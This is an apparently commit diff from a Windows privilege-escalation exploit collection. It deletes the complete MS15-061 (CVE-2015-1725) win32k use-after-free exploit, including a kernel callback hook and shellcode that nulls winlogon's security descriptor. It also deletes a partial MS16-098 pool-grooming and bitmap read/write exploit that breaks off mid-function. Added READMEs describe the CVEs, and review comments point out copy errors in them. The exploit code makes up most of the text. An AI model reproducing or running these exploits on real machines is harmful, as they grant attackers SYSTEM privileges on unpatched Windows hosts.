2: trigger vulnerability ( make proper Window to lead vulnerable function)
3: replace fake object with NtUserDefSetText in Desktop heap inside PEB callback
4: fake object with save exit buffer(0x0c0c0c0c) and pointer to tagWND
5: do it until bServerSideWindowProc is set
mail : Firozimaysam@gmail.com
twitter : https://twitter.com/R00tkitSMM
*/
// TODO: check OS version , Code refactoring
/*
ref:
https://www.nccgroup.trust/globalassets/our-research/uk/whitepapers/2015/08/2015-08-27_-_ncc_group_-_exploiting_ms15_061_uaf_-_release.pdf
http://www.mista.nu/research/mandt-win32k-slides.pdf
https://labs.mwrinfosecurity.com/blog/2013/09/06/mwr-labs-pwn2own-2013-write-up---kernel-exploit/
*/
typedef struct _HANDLEENTRY{
PVOID phead;
ULONG pOwner;
BYTE bType;
BYTE bFlags;
WORD wUniq;
}HANDLEENTRY,*PHANDLEENTRY;
typedef struct _SERVERINFO{
DWORD dwSRVIFlags;
DWORD cHandleEntries;
WORD wSRVIFlags;
WORD wRIPPID;
WORD wRIPError;
}SERVERINFO,*PSERVERINFO;
typedef struct _SHAREDINFO{
PSERVERINFO psi;
PHANDLEENTRY aheList;
ULONG HeEntrySize; // Win7 - not present in WinXP?
ULONG_PTR pDispInfo;
ULONG_PTR ulSharedDelta;
ULONG_PTR awmControl; // Not in XP
ULONG_PTR DefWindowMsgs; // Not in XP
ULONG_PTR DefWindowSpecMsgs; // Not in XP
}SHAREDINFO,*PSHAREDINFO;
void* Get__Win32ClientInfo()
{
/*
+0x1d4 GdiTebBatch : _GDI_TEB_BATCH
+0x6b4 RealClientId : _CLIENT_ID
+0x6bc GdiCachedProcessHandle : Ptr32 Void
+0x6c0 GdiClientPID : Uint4B
+0x6c4 GdiClientTID : Uint4B
+0x6c8 GdiThreadLocalInfo : Ptr32 Void
+0x6cc Win32ClientInfo : [62] Uint4B
*/
void* address=NULL;
__asm
{
mov eax,dword ptr fs:[00000018h] // eax=TEB
mov eax,dword ptr [eax+0x6cc] // Win32ClientInfo
mov address,eax;
}
return address;
}
CHAR originalCLS[0x5c+2];
HWND GetKernelHandle(HWND hwnd)
{
HWND kernelWindowHandle;
ULONG i;
HMODULE hUser32;
PSHAREDINFO pSharedInfo;
PSERVERINFO pServerInfo;
HANDLEENTRY *UserHandleTable;
pSharedInfo = (PSHAREDINFO)GetProcAddress(LoadLibraryA("user32.dll"), "gSharedInfo");
if (pSharedInfo == NULL)
{
printf("[-] Unable to locate SharedInfo");
return NULL;
} else {
printf("[*] SharedInfo @ %#p\r\n", pSharedInfo);
}
UserHandleTable = pSharedInfo->aheList;
printf("[*] aheList @ %#p\r\n", UserHandleTable);
pServerInfo = pSharedInfo->psi;
printf("[*] pServerInfo @ %#p\r\n", pServerInfo);
printf("[*] Handle Count: %d\r\n", pServerInfo->cHandleEntries);
// printf("User Delta 0x%p\r\n", pSharedInfo->ulSharedDelta); Not used
for(i = 0; i < pServerInfo->cHandleEntries; i++ )
{
__try
{
//
kernelWindowHandle = (HWND)(i | (UserHandleTable[i].wUniq << 0x10));
if( kernelWindowHandle == hwnd )
{
kernelWindowHandle = (HWND)UserHandleTable[i].phead;
printf("[+] Kernel Window Handle found @ %#p\r\n", kernelWindowHandle);
return kernelWindowHandle;
}
}
__except(EXCEPTION_EXECUTE_HANDLER) {}
}
return NULL;
}
VOID ArbDecByOne(DWORD addr){
*(DWORD *)(originalCLS + 0x58) = addr - 0x4;
}
typedef struct _LARGE_UNICODE_STRING {
ULONG Length;
ULONG MaximumLength : 31;
ULONG bAnsi : 1;
PWSTR Buffer;
} LARGE_UNICODE_STRING, *PLARGE_UNICODE_STRING;
VOID RtlInitLargeUnicodeString(
PLARGE_UNICODE_STRING plstr,
LPCWSTR psz,
UINT cchLimit)
{
ULONG Length;
plstr->Buffer = (PWSTR)psz;
plstr->bAnsi = FALSE;
if ( psz!=NULL) {
Length = wcslen( psz ) * sizeof( WCHAR );
plstr->Length = min(Length, cchLimit);
plstr->MaximumLength = min((Length + sizeof(UNICODE_NULL)), cchLimit);
} else {
plstr->MaximumLength = 0;
plstr->Length = 0;
}
}
__declspec(naked) BOOL NTAPI NtUserDefSetText(
IN HWND hwnd,
IN PLARGE_UNICODE_STRING pstrText OPTIONAL
)
{
__asm
{
mov eax, 116Dh
mov edx, 7FFE0300h
call dword ptr [edx]
retn 8
}
}
//the Window Procedure
LRESULT CALLBACK WndProc(HWND hwnd, UINT msg, WPARAM wParam, LPARAM lParam)
{
return DefWindowProc(hwnd, msg, wParam, lParam);
}
void* kernelHandle;
__declspec(noinline) int Shellcode()
{
//return MessageBoxA(NULL,"Boom","boom",0);
__asm {
mov eax, kernelHandle // WND - Which window? Check this
mov eax, [eax+8] // THREADINFO
mov eax, [eax] // ETHREAD
mov eax, [eax+0x150] // KPROCESS
mov eax, [eax+0xb8] // flink
procloop:
lea edx, [eax-0xb8] // KPROCESS
mov eax, [eax]
add edx, 0x16c // module name
cmp dword ptr [edx], 0x6c6e6977 // “winl” for winlogon.exe
jne procloop
sub edx, 0x170
mov dword ptr [edx], 0x0 // NULL ACL
}
}
BOOL success = FALSE;
LRESULT CALLBACK WndProc2(HWND hwnd, UINT msg, WPARAM wParam, LPARAM lParam)
{
WORD um=0;
__asm
{
mov ax, cs
mov um, ax
}
if(um == 0x1b)
{
// USER MODE
} else
{
success=TRUE;
DebugBreak();
Shellcode();
}
return DefWindowProc(hwnd, msg, wParam, lParam);
}
HWND Secondhwnd[50];
int SecondWindowIndex=1;
void CreateSecondWindow()
{
WNDCLASSEX wc;
const WCHAR g_szClassName[] = L"SecondClass";
//Step 1: Registering the Window Class
wc.cbSize = sizeof(WNDCLASSEX);
wc.style = 0;
wc.lpfnWndProc = WndProc2;
wc.cbClsExtra = 0;
wc.cbWndExtra = 0;
wc.hInstance = NULL;
wc.hIcon = LoadIcon(NULL,IDI_QUESTION);
wc.hCursor = LoadCursor(NULL, IDI_QUESTION);
wc.hbrBackground = (HBRUSH)(COLOR_WINDOW+1);
wc.lpszMenuName = NULL;
wc.lpszClassName = g_szClassName;
wc.hIconSm = LoadIcon(NULL,IDI_QUESTION);
if(!RegisterClassExW(&wc))
{
return ;
}
for ( int i=0;i<50;i++)
{
Secondhwnd[i] = CreateWindowEx(
WS_EX_CLIENTEDGE,
g_szClassName,
L"The title of my window",
WS_OVERLAPPEDWINDOW,
CW_USEDEFAULT, CW_USEDEFAULT, 240, 120,
NULL, NULL, NULL, NULL);
if(Secondhwnd[i] == NULL)
{
return ;
}
}
}
const WCHAR g_szClassName[] = L"MS15-061";
HWND hwnd;
HINSTANCE hInstance2;
typedef NTSTATUS (NTAPI *pUser32_ClientCopyImage)(PVOID p);
pUser32_ClientCopyImage g_originalCCI;
void* __ClientCopyImageAddress;
NTSTATUS NTAPI hookCCI(PVOID p)
{
LARGE_UNICODE_STRING plstr;
// free WND object
DestroyWindow(hwnd);
UnregisterClassW(g_szClassName,NULL);
/*
.text:BF89EA6D push edx
.text:BF89EA6E call _xxxClientCopyImage@20 ; xxxClientCopyImage(x,x,x,x,x)
.text:BF89EA73 lea esi, [edi+58h] ------->>>> replace edi memeory with NtUserDefSetText
.text:BF89EA76 mov edx, eax
.text:BF89EA78 mov ecx, esi
.text:BF89EA7A call @HMAssignmentLock@8 ; HMAssignmentLock(x,x)
*/
DebugBreak();
RtlInitLargeUnicodeString(&plstr,(WCHAR*)originalCLS, (UINT)-1);
NtUserDefSetText(Secondhwnd[SecondWindowIndex],&plstr);
SecondWindowIndex+=1;
return g_originalCCI(p);
}
void* Get__ClientCopyImageAddressInPEB()
{
void* address=NULL;
__asm
{
mov edx , 0xD8; // 0x36 *4 -> API index *4 number for __ClientCopyImage
mov eax,dword ptr fs:[00000018h] // eax=TEB
mov eax,dword ptr [eax+30h] // EAX=PEB
mov eax,dword ptr [eax+2Ch] // EAX=KernelCallbackTable
add eax,edx
mov address,eax;
int 3
}
return address;
}
void init()
{
DWORD prot;
LoadLibraryA("user32.dll");
CreateSecondWindow();
void* lpvBase = VirtualAlloc(
(void*)0x0c0c0c0c, // System selects address
2048, // Size of allocation
MEM_RESERVE|MEM_COMMIT, // Allocate reserved pages
PAGE_READWRITE); // Protection = no access
/*
for save exit : i used trick like Browser Fake vTable :
allocate 0x0c0c0c0c address and fill tagWND with 0x0c0c0c0c
so every dereference will loop in 0x0c0c0c0c
*/
memset(lpvBase,'\x0c',2048);
memset(originalCLS,0,0x5c+2);
memset(originalCLS,'\x0c',0x5c);
/*
+0x014 bForceMenuDraw : Pos 15, 1 Bit
+0x014 bDialogWindow : Pos 16, 1 Bit
+0x014 bHasCreatestructName : Pos 17, 1 Bit
+0x014 bServerSideWindowProc : Pos 18, 1 Bit
+0x014 bAnsiWindowProc : Pos 19, 1 Bit
*/
kernelHandle=GetKernelHandle(Secondhwnd[0]);
ArbDecByOne((DWORD)kernelHandle+0x14); //
__ClientCopyImageAddress=Get__ClientCopyImageAddressInPEB();
printf("address of __ClientCopyImage is %x \r\n",__ClientCopyImageAddress);
if (!VirtualProtect(__ClientCopyImageAddress, sizeof(PVOID), PAGE_EXECUTE_READWRITE, &prot))
{
return ;
}
g_originalCCI =(pUser32_ClientCopyImage) InterlockedExchangePointer(__ClientCopyImageAddress, &hookCCI);
}
int main()
{
WNDCLASSEX wc;
int x;
MSG Msg;
//Step 1: Registering the Window Class
wc.cbSize = sizeof(WNDCLASSEX);
wc.style = 0;
wc.lpfnWndProc = WndProc;
wc.cbClsExtra = 0;
wc.cbWndExtra = 0;
wc.hInstance = NULL;
wc.hIcon = NULL; // bypass check inside xxxSetClassIcon to lead execution path to callback
wc.hCursor = NULL; // bypass check inside xxxSetClassIcon to lead execution path to callback
wc.hbrBackground = (HBRUSH)(COLOR_WINDOW+1);
wc.lpszMenuName = NULL;
wc.lpszClassName = g_szClassName;
wc.hIconSm = NULL; // bypass "if" inside xxxSetClassIcon to lead execution path to callback
init();
/*
.text:BF91B33C mov edi, [ebp+pclsBase]
..............
..............
.text:BF91B346 mov eax, [edi+58h]
.text:BF91B349 cmp eax, [ebp+arg_8] ; new and old icon must be diffrent
.text:BF91B34C jz loc_BF91B42C ----------->>> we need bypass this
..............
..............
.text:BF91B396 loc_BF91B396: ; CODE XREF: xxxSetClassIcon(x,x,x,x)+68j
.text:BF91B396 lea esi, [edi+58h] ; EDI
.text:BF91B399 mov ecx, esi
.text:BF91B39B mov edx, [ebp+arg_8]
.text:BF91B39E call @HMAssignmentLock@8 ; HMAssignmentLock(x,x)
.text:BF91B3A3 cmp dword ptr [edi+44h], 0
.text:BF91B3A7 jz short loc_BF91B3B4 ---------->>> we need bypass this
.text:BF91B3A9 cmp dword ptr [esi], 0
.text:BF91B3AC jnz short loc_BF91B3B4 ---------->>> we need bypass this
.text:BF91B3AE push edi
.text:BF91B3AF call _xxxCreateClassSmIcon@4 ; xxxCreateClassSmIcon(x)
*/
do
{
if(!RegisterClassExW(&wc))
{
return 0;
}
// Step 2: Creating the Window
hwnd = CreateWindowEx(
WS_EX_CLIENTEDGE,
g_szClassName,
L"The title of my window",
WS_OVERLAPPEDWINDOW,
CW_USEDEFAULT, CW_USEDEFAULT, 240, 120,
NULL, NULL, NULL, NULL);
if(hwnd == NULL)
{
return 0;
}
ShowWindow(hwnd, NULL);
UpdateWindow(hwnd);
//Triger UserMode CallBack
SetClassLongPtr(hwnd, GCLP_HICON, (LONG_PTR)LoadIcon(NULL, IDI_QUESTION));
SendMessageW(Secondhwnd[0], WM_NULL, NULL, NULL);
}while(!success);
}
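Review bot: this hunk removes the whole MS15-061 (CVE-2015-1725) PoC source, and with it the only readable record of what the code did: `hookCCI` installed over the `__ClientCopyImage` slot of the PEB `KernelCallbackTable` through `InterlockedExchangePointer`, driven from `SetClassLongPtr(hwnd, GCLP_HICON, ...)`. The English README added in this same commit describes the replacement archive as "code status unknown", so readers lose both the code and any statement of what it was. Keep the source beside the archive, or say in the README that the archive is a repack of the Rootkitsmm/MS15-061 project it lists under ProjectSource. The deleted code is also x86-only (`fs:[18h]` TEB walk in `Get__ClientCopyImageAddressInPEB`, `DebugBreak()` and `int 3` left in the hot path), which belongs in the README's Tested/Utilization rows rather than in a blank Tested column.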

Binary file not shown.

@@ -21,9 +21,15 @@
| Windows Server 2012 | | R2 | | |
| Windows Vista | | | SP2 | |
#### 修复补丁
```
https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2015-1725
```
#### 利用方式
有源码,未知编译方式
该漏洞并未进行测试,根目录留存着网络收集**[CVE编号].zip**的EXP或者POC代码状态未知
#### 项目来源
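Review bot: the hunk header promises a 15-line new range, but as shown the hunk ends at the new `#### 项目来源` heading with no entries under it, while the English README for the same CVE in this commit lists Rootkitsmm/MS15-061 and two ms-15-061 write-ups; if those entries are meant to be here, verify the committed file actually has them. The replaced line `有源码,未知编译方式` (source available, build method unknown) was at least accurate about the source that existed before this commit; the new sentence only says the archive is untested and of unknown status, so state that the source was moved into the archive rather than leaving its provenance open.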

@@ -0,0 +1,42 @@
### CVE-2015-1725
#### Describe
NT AUTHORITY/SYSTEM
#### ImpactVersion
| Product | CPU Architecture | Version | Update | Tested |
| ------------------- | ---------------- | ------- | ------ | ------ |
| Windows 7 | | | SP1 | |
| Windows 8 | | | | |
| Windows 8.1 | | | | |
| Windows Rt | | | | |
| Windows Rt 8.1 | | | | |
| Windows Server 2003 | | | SP2 | |
| Windows Server 2003 | | R2 | SP2 | |
| Windows Server 2008 | | | SP2 | |
| Windows Server 2008 | | R2 | SP1 | |
| Windows Server 2012 | | | | |
| Windows Server 2012 | | R2 | | |
| Windows Vista | | | SP2 | |
#### Patch
```
https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2015-1725
```
#### Utilization
The vulnerability does not test, the root directory is stored in the network collection **[CVE number] .zip** EXP or POC, code status unknown
#### ProjectSource
- [Rootkitsmm](https://github.com/Rootkitsmm/MS15-061)
#### Analyse
- https://github.com/LibreCrops/translation-zh_CN/blob/master/source/ms-15-061.rst
- https://translation-zh-cn.readthedocs.io/zh_CN/latest/ms-15-061.html
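Review bot: `#### Describe` contains only `NT AUTHORITY/SYSTEM`, which is the privilege the PoC obtains, not a description of CVE-2015-1725; the other English READMEs in this commit paste the advisory text there, so do the same. The `#### Utilization` sentence is garbled: "This vulnerability has not been tested; the root directory keeps an EXP/PoC collected from the internet as **[CVE number].zip**, code status unknown" says what is meant. That sentence recurs verbatim in the CVE-2016-3309, CVE-2018-8440 and CVE-2019-0859 English READMEs added in this commit, so fix it in all four at once.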

Binary file not shown.

@@ -1,28 +0,0 @@
Microsoft Visual Studio Solution File, Format Version 12.00
# Visual Studio 14
VisualStudioVersion = 14.0.24720.0
MinimumVisualStudioVersion = 10.0.40219.1
Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "MS16-098", "MS16-098.vcxproj", "{DF0232CA-2590-4AD6-9A4C-CDE7DAAB3B6F}"
EndProject
Global
GlobalSection(SolutionConfigurationPlatforms) = preSolution
Debug|x64 = Debug|x64
Debug|x86 = Debug|x86
Release|x64 = Release|x64
Release|x86 = Release|x86
EndGlobalSection
GlobalSection(ProjectConfigurationPlatforms) = postSolution
{DF0232CA-2590-4AD6-9A4C-CDE7DAAB3B6F}.Debug|x64.ActiveCfg = Debug|x64
{DF0232CA-2590-4AD6-9A4C-CDE7DAAB3B6F}.Debug|x64.Build.0 = Debug|x64
{DF0232CA-2590-4AD6-9A4C-CDE7DAAB3B6F}.Debug|x86.ActiveCfg = Debug|Win32
{DF0232CA-2590-4AD6-9A4C-CDE7DAAB3B6F}.Debug|x86.Build.0 = Debug|Win32
{DF0232CA-2590-4AD6-9A4C-CDE7DAAB3B6F}.Release|x64.ActiveCfg = Release|x64
{DF0232CA-2590-4AD6-9A4C-CDE7DAAB3B6F}.Release|x64.Build.0 = Release|x64
{DF0232CA-2590-4AD6-9A4C-CDE7DAAB3B6F}.Release|x86.ActiveCfg = Release|Win32
{DF0232CA-2590-4AD6-9A4C-CDE7DAAB3B6F}.Release|x86.Build.0 = Release|Win32
EndGlobalSection
GlobalSection(SolutionProperties) = preSolution
HideSolutionNode = FALSE
EndGlobalSection
EndGlobal

@@ -1,118 +0,0 @@
<?xml version="1.0" encoding="utf-8"?>
<Project DefaultTargets="Build" ToolsVersion="14.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<ItemGroup Label="ProjectConfigurations">
<ProjectConfiguration Include="Debug|Win32">
<Configuration>Debug</Configuration>
<Platform>Win32</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Release|Win32">
<Configuration>Release</Configuration>
<Platform>Win32</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Debug|x64">
<Configuration>Debug</Configuration>
<Platform>x64</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Release|x64">
<Configuration>Release</Configuration>
<Platform>x64</Platform>
</ProjectConfiguration>
</ItemGroup>
<PropertyGroup Label="Globals">
<ProjectGuid>{DF0232CA-2590-4AD6-9A4C-CDE7DAAB3B6F}</ProjectGuid>
<RootNamespace>MS16098</RootNamespace>
<WindowsTargetPlatformVersion>8.1</WindowsTargetPlatformVersion>
</PropertyGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
<ConfigurationType>Application</ConfigurationType>
<UseDebugLibraries>true</UseDebugLibraries>
<PlatformToolset>v140</PlatformToolset>
<CharacterSet>MultiByte</CharacterSet>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
<ConfigurationType>Application</ConfigurationType>
<UseDebugLibraries>false</UseDebugLibraries>
<PlatformToolset>v140</PlatformToolset>
<WholeProgramOptimization>true</WholeProgramOptimization>
<CharacterSet>MultiByte</CharacterSet>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
<ConfigurationType>Application</ConfigurationType>
<UseDebugLibraries>true</UseDebugLibraries>
<PlatformToolset>v140</PlatformToolset>
<CharacterSet>MultiByte</CharacterSet>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
<ConfigurationType>Application</ConfigurationType>
<UseDebugLibraries>false</UseDebugLibraries>
<PlatformToolset>v140</PlatformToolset>
<WholeProgramOptimization>true</WholeProgramOptimization>
<CharacterSet>MultiByte</CharacterSet>
</PropertyGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
<ImportGroup Label="ExtensionSettings">
</ImportGroup>
<ImportGroup Label="Shared">
</ImportGroup>
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<PropertyGroup Label="UserMacros" />
<PropertyGroup />
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
<ClCompile>
<WarningLevel>Level3</WarningLevel>
<Optimization>Disabled</Optimization>
<SDLCheck>true</SDLCheck>
</ClCompile>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
<ClCompile>
<WarningLevel>Level3</WarningLevel>
<Optimization>Disabled</Optimization>
<SDLCheck>true</SDLCheck>
</ClCompile>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
<ClCompile>
<WarningLevel>Level3</WarningLevel>
<Optimization>MaxSpeed</Optimization>
<FunctionLevelLinking>true</FunctionLevelLinking>
<IntrinsicFunctions>true</IntrinsicFunctions>
<SDLCheck>true</SDLCheck>
</ClCompile>
<Link>
<EnableCOMDATFolding>true</EnableCOMDATFolding>
<OptimizeReferences>true</OptimizeReferences>
</Link>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
<ClCompile>
<WarningLevel>Level3</WarningLevel>
<Optimization>MaxSpeed</Optimization>
<FunctionLevelLinking>true</FunctionLevelLinking>
<IntrinsicFunctions>true</IntrinsicFunctions>
<SDLCheck>true</SDLCheck>
</ClCompile>
<Link>
<EnableCOMDATFolding>true</EnableCOMDATFolding>
<OptimizeReferences>true</OptimizeReferences>
</Link>
</ItemDefinitionGroup>
<ItemGroup>
<ClCompile Include="main.c" />
</ItemGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
<ImportGroup Label="ExtensionTargets">
</ImportGroup>
</Project>

@@ -1,22 +0,0 @@
<?xml version="1.0" encoding="utf-8"?>
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<ItemGroup>
<Filter Include="Source Files">
<UniqueIdentifier>{4FC737F1-C7A5-4376-A066-2A32D752A2FF}</UniqueIdentifier>
<Extensions>cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx</Extensions>
</Filter>
<Filter Include="Header Files">
<UniqueIdentifier>{93995380-89BD-4b04-88EB-625FBE52EBFB}</UniqueIdentifier>
<Extensions>h;hh;hpp;hxx;hm;inl;inc;xsd</Extensions>
</Filter>
<Filter Include="Resource Files">
<UniqueIdentifier>{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}</UniqueIdentifier>
<Extensions>rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms</Extensions>
</Filter>
</ItemGroup>
<ItemGroup>
<ClCompile Include="main.c">
<Filter>Source Files</Filter>
</ClCompile>
</ItemGroup>
</Project>

@@ -1,4 +0,0 @@
<?xml version="1.0" encoding="utf-8"?>
<Project ToolsVersion="Current" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<PropertyGroup />
</Project>

@@ -32,7 +32,7 @@ https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2016-3309
- VS2019V140X64 Release/Debug
暂无测试,测试请移步项目来源看演示
该漏洞并未进行测试,根目录留存着网络收集**[CVE编号].zip**的EXP或者POC代码状态未知
#### 项目来源
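Review bot: this hunk keeps `VS2019V140X64 Release/Debug` as the build line while the same commit deletes MS16-098.sln and MS16-098.vcxproj, the v140-toolset project files that line describes, so the build instruction now points at nothing; either drop it or say the archive contains the project. The adjacent sentences `暂无测试,测试请移步项目来源看演示` and the new `该漏洞并未进行测试...` both say the PoC is untested; keep one.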

@@ -0,0 +1,48 @@
### CVE-2016-3309
#### Describe
The kernel-mode drivers in Microsoft Windows Vista SP2; Windows Server 2008 SP2 and R2 SP1; Windows 7 SP1; Windows 8.1; Windows Server 2012 Gold and R2; Windows RT 8.1; and Windows 10 Gold, 1511, and 1607 allow local users to gain privileges via a crafted application, aka "Win32k Elevation of Privilege Vulnerability," a different vulnerability than CVE-2016-3309, CVE-2016-3310, and CVE-2016-3311.
#### ImpactVersion
| Product | CPU Architecture | Version | Update | Tested |
| ------------------- | ---------------- | ------- | ------ | ------ |
| Windows 10 | x86/x64 | | | |
| Windows 10 | x86/x64 | 1511 | | |
| Windows 10 | x86/x64 | 1607 | | |
| Windows 7 | x86/x64 | | SP1 | |
| Windows 8.1 | x86/x64 | | | |
| Windows Rt 8.1 | | | | |
| Windows Server 2008 | x86/x64 | | SP2 | |
| Windows Server 2008 | x86/x64 | R2 | SP1 | |
| Windows Server 2012 | | | | |
| Windows Server 2012 | | R2 | | |
| Windows Vista | | | SP2 | |
#### Patch
```
https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2016-3309
```
#### Utilization
The vulnerability does not test, the root directory is stored in the network collection **[CVE number] .zip** EXP or POC, code status unknown
#### ProjectSource
- [sensepost](https://github.com/bluefrostsecurity/CVE-2019-1215)
#### Analyse
- https://paper.seebug.org/37/
- https://xz.aliyun.com/t/4543
- https://github.com/55-AA/CVE-2016-3308/blob/master/CVE-2016-3308.md
- https://xz.aliyun.com/t/2919
- https://paper.seebug.org/320/
- https://security.tencent.com/index.php/blog/msg/117
- https://www.anquanke.com/post/id/85302
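Review bot: the `#### Describe` text says CVE-2016-3309 is "a different vulnerability than CVE-2016-3309, CVE-2016-3310, and CVE-2016-3311", i.e. different from itself, which is a copy error; the Analyse list already links a CVE-2016-3308 write-up, which is the likely intended sibling, so check the sentence against the advisory and correct it. Under `#### ProjectSource` the link text says `sensepost` but the URL is bluefrostsecurity's CVE-2019-1215 repository, a different bug; the main.c deleted in this commit (`fungshuei()`, bitmap-based `ReadFromAddress`/`WriteToAddress`) is SensePost's MS16-098 exploit, so the URL should point at that project.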

@@ -1,339 +0,0 @@
#include <Windows.h>
#include <wingdi.h>
#include <stdio.h>
#include <winddi.h>
#include <time.h>
#include <stdlib.h>
#include <Psapi.h>
HANDLE hWorker, hManager;
BYTE *bits;
//dt nt!_EPROCESS UniqueProcessID ActiveProcessLinks Token
typedef struct
{
DWORD UniqueProcessIdOffset;
DWORD TokenOffset;
} VersionSpecificConfig;
VersionSpecificConfig gConfig = { 0x2e0, 0x348 }; //win 8.1
void AllocateClipBoard(unsigned int size) {
BYTE *buffer;
buffer = malloc(size);
memset(buffer, 0x41, size);
buffer[size - 1] = 0x00;
const size_t len = size;
HGLOBAL hMem = GlobalAlloc(GMEM_MOVEABLE, len);
memcpy(GlobalLock(hMem), buffer, len);
GlobalUnlock(hMem);
//OpenClipboard(wnd);
//EmptyClipboard();
SetClipboardData(CF_TEXT, hMem);
//CloseClipboard();
GlobalFree(hMem);
}
void AllocateClipBoard2(unsigned int size) {
BYTE *buffer;
buffer = malloc(size);
memset(buffer, 0x41, size);
buffer[size - 1] = 0x00;
const size_t len = size;
HGLOBAL hMem = GlobalAlloc(GMEM_MOVEABLE, len);
memcpy(GlobalLock(hMem), buffer, len);
GlobalUnlock(hMem);
//OpenClipboard(0);
//EmptyClipboard();
SetClipboardData(CF_TEXT, hMem);
//CloseClipboard();
//GlobalFree(hMem);
}
//https://www-user.tu-chemnitz.de/~heha/petzold/ch14e.htm
// CreateBitmap(7,9,5,3,NULL);
//iWidthBytes = 2 * ((cx*bitsperpixel+15)/16) = 4.5 ~ 4
//iBitmapBits = (cy * cplanes * iWidthBytes = 180
static HBITMAP bitmaps[5000];
void fungshuei() {
HBITMAP bmp;
for (int k = 0; k < 5000; k++) {
//bmp = CreateBitmap(1685, 2, 1, 8, NULL); //800 = 0x8b0 820 = 0x8e0 1730 = 0x1000 1700 = 0xfc0 1670 = 0xf70
bmp = CreateBitmap(1670, 2, 1, 8, NULL); // 1680 = 0xf80 1685 = 0xf90 allocation size 0xfa0
bitmaps[k] = bmp;
}
HACCEL hAccel, hAccel2;
LPACCEL lpAccel;
// Initial setup for pool fengshui.
lpAccel = (LPACCEL)malloc(sizeof(ACCEL));
SecureZeroMemory(lpAccel, sizeof(ACCEL));
HACCEL *pAccels = (HACCEL *)malloc(sizeof(HACCEL) * 7000);
HACCEL *pAccels2 = (HACCEL *)malloc(sizeof(HACCEL) * 7000);
for (INT i = 0; i < 7000; i++) {
hAccel = CreateAcceleratorTableA(lpAccel, 1);
hAccel2 = CreateAcceleratorTableW(lpAccel, 1);
pAccels[i] = hAccel;
pAccels2[i] = hAccel2;
}
for (int k = 0; k < 5000; k++) {
DeleteObject(bitmaps[k]);
}
for (int k = 0; k < 5000; k++) {
//AllocateClipBoard2(0xB90);
CreateEllipticRgn(0x79, 0x79, 1, 1); //size = 0xbc0
}
for (int k = 0; k < 5000; k++) {
//bmp = CreateBitmap(160, 2, 1, 8, NULL); //160 = 0x3a0 real allocation size 0x3b0
//bmp = CreateBitmap(165, 2, 1, 8, NULL); // size 3c0 // 140 = size = 390
bmp = CreateBitmap(0x52, 1, 1, 32, NULL); //size = 3c0
//bmp = CreateBitmap(0x150, 1, 1, 8, NULL); //size = 3c0
//bmp = CreateBitmap(0xa2, 1, 1, 16, NULL); // size = 3c0
bitmaps[k] = bmp;
}
for (int k = 0; k < 1700; k++) { //1500
AllocateClipBoard2(0x30);
}
for (int k = 2000; k < 4000; k++) {
DestroyAcceleratorTable(pAccels[k]);
DestroyAcceleratorTable(pAccels2[k]);
}
}
void SetAddress(BYTE* address) {
for (int i = 0; i < sizeof(address); i++) {
bits[0xdf0 + i] = address[i];
}
SetBitmapBits(hManager, 0x1000, bits);
}
void WriteToAddress(BYTE* data) {
SetBitmapBits(hWorker, sizeof(data), data);
}
LONG ReadFromAddress(ULONG64 src, BYTE* dst, DWORD len) {
SetAddress((BYTE *)&src);
return GetBitmapBits(hWorker, len, dst);
}
// Get base of ntoskrnl.exe
ULONG64 GetNTOsBase()
{
ULONG64 Bases[0x1000];
DWORD needed = 0;
ULONG64 krnlbase = 0;
